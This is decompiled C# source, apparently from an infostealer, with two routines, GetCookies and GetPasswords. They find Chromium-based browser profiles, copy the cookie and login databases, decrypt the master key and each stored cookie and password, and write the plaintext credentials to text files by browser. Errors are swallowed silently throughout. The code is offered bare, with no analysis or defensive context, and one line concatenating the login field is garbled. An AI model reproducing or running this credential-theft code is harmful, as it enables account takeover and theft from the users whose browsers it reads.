// Token: 0x0600002A RID: 42 RVA: 0x00007340 File Offset: 0x00005540
public static void GetCookies(string path2save)
{
try
{
List <string> list = new List <string>();
List <string> list2 = new List <string>();
list2.Add(Help.AppDate);
list2.Add(Help.LocalData);
List <string> list3 = new List <string>();
foreach (string path in list2)
{
try
{
list3.AddRange(Directory.GetDirectories(path));
}
catch
{
}
}
foreach (string text in list3)
{
string text2 = "";
string[] array = null;
try
{
list.AddRange(Directory.GetFiles(text, "Cookies", SearchOption.AllDirectories));
array = Directory.GetFiles(text, "Cookies", SearchOption.AllDirectories);
}
catch
{
}
if (array != null)
{
foreach (string text3 in array)
{
try
{
if (File.Exists(text3))
{
string text4 = "Unknown";
foreach (string text5 in Chromium.BrowsersName)
{
if (text.Contains(text5))
{
text4 = text5;
}
}
string sourceFileName = text3;
string sourceFileName2 = text3 + "\\..\\..\\Local State";
if (File.Exists(Chromium.bd))
{
File.Delete(Chromium.bd);
}
if (File.Exists(Chromium.ls))
{
File.Delete(Chromium.ls);
}
File.Copy(sourceFileName, Chromium.bd);
File.Copy(sourceFileName2, Chromium.ls);
SqlHandler sqlHandler = new SqlHandler(Chromium.bd);
new List <PassData>();
sqlHandler.ReadTable("cookies");
string text6 = File.ReadAllText(Chromium.ls);
string[] array4 = Regex.Split(text6, "\"");
int num = 0;
string[] array3 = array4;
for (int j = 0; j < array3.Length; j++)
{
if (array3[j] == "encrypted_key")
{
text6 = array4[num + 2];
break;
}
num++;
}
byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text6)).Remove(0, 5)), null);
int rowCount = sqlHandler.GetRowCount();
for (int k = 0; k < rowCount; k++)
{
try
{
string value = sqlHandler.GetValue(k, 12);
byte[] bytes = Encoding.Default.GetBytes(value);
try
{
string text7;
if (value.StartsWith("v10"))
{
byte[] iv = bytes.Skip(3).Take(12).ToArray <byte>();
text7 = AesGcm256.Decrypt(bytes.Skip(15).ToArray <byte>(), key, iv);
}
else
{
text7 = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(bytes, null));
}
string value2 = sqlHandler.GetValue(k, 1);
string value3 = sqlHandler.GetValue(k, 2);
string value4 = sqlHandler.GetValue(k, 4);
string value5 = sqlHandler.GetValue(k, 5);
string value6 = sqlHandler.GetValue(k, 6);
text2 += string.Format("{0}\tFALSE\t{1}\t{2}\t{3}\t{4}\t{5}\r\n", new object[]
{
value2,
value4,
value6.ToUpper(),
value5,
value3,
text7
});
Chromium.Cookies++;
}
catch
{
}
}
catch
{
}
}
if (File.Exists(Chromium.bd))
{
File.Delete(Chromium.bd);
}
if (File.Exists(Chromium.ls))
{
File.Delete(Chromium.ls);
}
if (text4 == "Unknown")
{
File.AppendAllText(path2save + "\\Cookies_" + text4 + ".txt", text2);
}
else
{
File.WriteAllText(path2save + "\\Cookies_" + text4 + ".txt", text2);
}
}
}
catch
{
}
}
}
}
}
catch
{
}
}
// Token: 0x06000028 RID: 40 RVA: 0x00006A28 File Offset: 0x00004C28
public static void GetPasswords(string path2save)
{
try
{
List <string> list = new List <string>();
List <string> list2 = new List <string>();
list2.Add(Help.AppDate);
list2.Add(Help.LocalData);
List <string> list3 = new List <string>();
foreach (string path in list2)
{
try
{
list3.AddRange(Directory.GetDirectories(path));
}
catch
{
}
}
foreach (string text in list3)
{
string[] array = null;
string text2 = "";
try
{
list.AddRange(Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories));
array = Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories);
}
catch
{
}
if (array != null)
{
foreach (string text3 in array)
{
try
{
if (File.Exists(text3))
{
string text4 = "Unknown";
foreach (string text5 in Chromium.BrowsersName)
{
if (text.Contains(text5))
{
text4 = text5;
}
}
string sourceFileName = text3;
string sourceFileName2 = text3 + "\\..\\..\\Local State";
if (File.Exists(Chromium.bd))
{
File.Delete(Chromium.bd);
}
if (File.Exists(Chromium.ls))
{
File.Delete(Chromium.ls);
}
File.Copy(sourceFileName, Chromium.bd);
File.Copy(sourceFileName2, Chromium.ls);
SqlHandler sqlHandler = new SqlHandler(Chromium.bd);
new List <PassData>();
sqlHandler.ReadTable("logins");
string text6 = File.ReadAllText(Chromium.ls);
string[] array4 = Regex.Split(text6, "\"");
int num = 0;
string[] array3 = array4;
for (int j = 0; j < array3.Length; j++)
{
if (array3[j] == "encrypted_key")
{
text6 = array4[num + 2];
break;
}
num++;
}
byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text6)).Remove(0, 5)), null);
int rowCount = sqlHandler.GetRowCount();
for (int k = 0; k < rowCount; k++)
{
try
{
string value = sqlHandler.GetValue(k, 5);
byte[] bytes = Encoding.Default.GetBytes(value);
string str = "";
try
{
if (value.StartsWith("v10") || value.StartsWith("v11"))
{
byte[] iv = bytes.Skip(3).Take(12).ToArray <byte>();
str = AesGcm256.Decrypt(bytes.Skip(15).ToArray <byte>(), key, iv);
}
else
{
str = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(bytes, null));
}
}
catch
{
}
text2 = text2 + "Url: " + sqlHandler.GetValue(k, 1) + "\r\n";
text2 = text2 + "Login: "******"\r\n";
text2 = text2 + "Passwords: " + str + "\r\n";
text2 = text2 + "Browser: " + text4 + "\r\n\r\n";
Chromium.Passwords++;
}
catch
{
}
}
if (File.Exists(Chromium.bd))
{
File.Delete(Chromium.bd);
}
if (File.Exists(Chromium.ls))
{
File.Delete(Chromium.ls);
}
if (text4 == "Unknown")
{
File.AppendAllText(path2save + "\\Passwords_" + text4 + ".txt", text2);
}
else
{
File.WriteAllText(path2save + "\\Passwords_" + text4 + ".txt", text2);
}
}
}
catch
{
}
}
}
}
}
catch
{
}
}
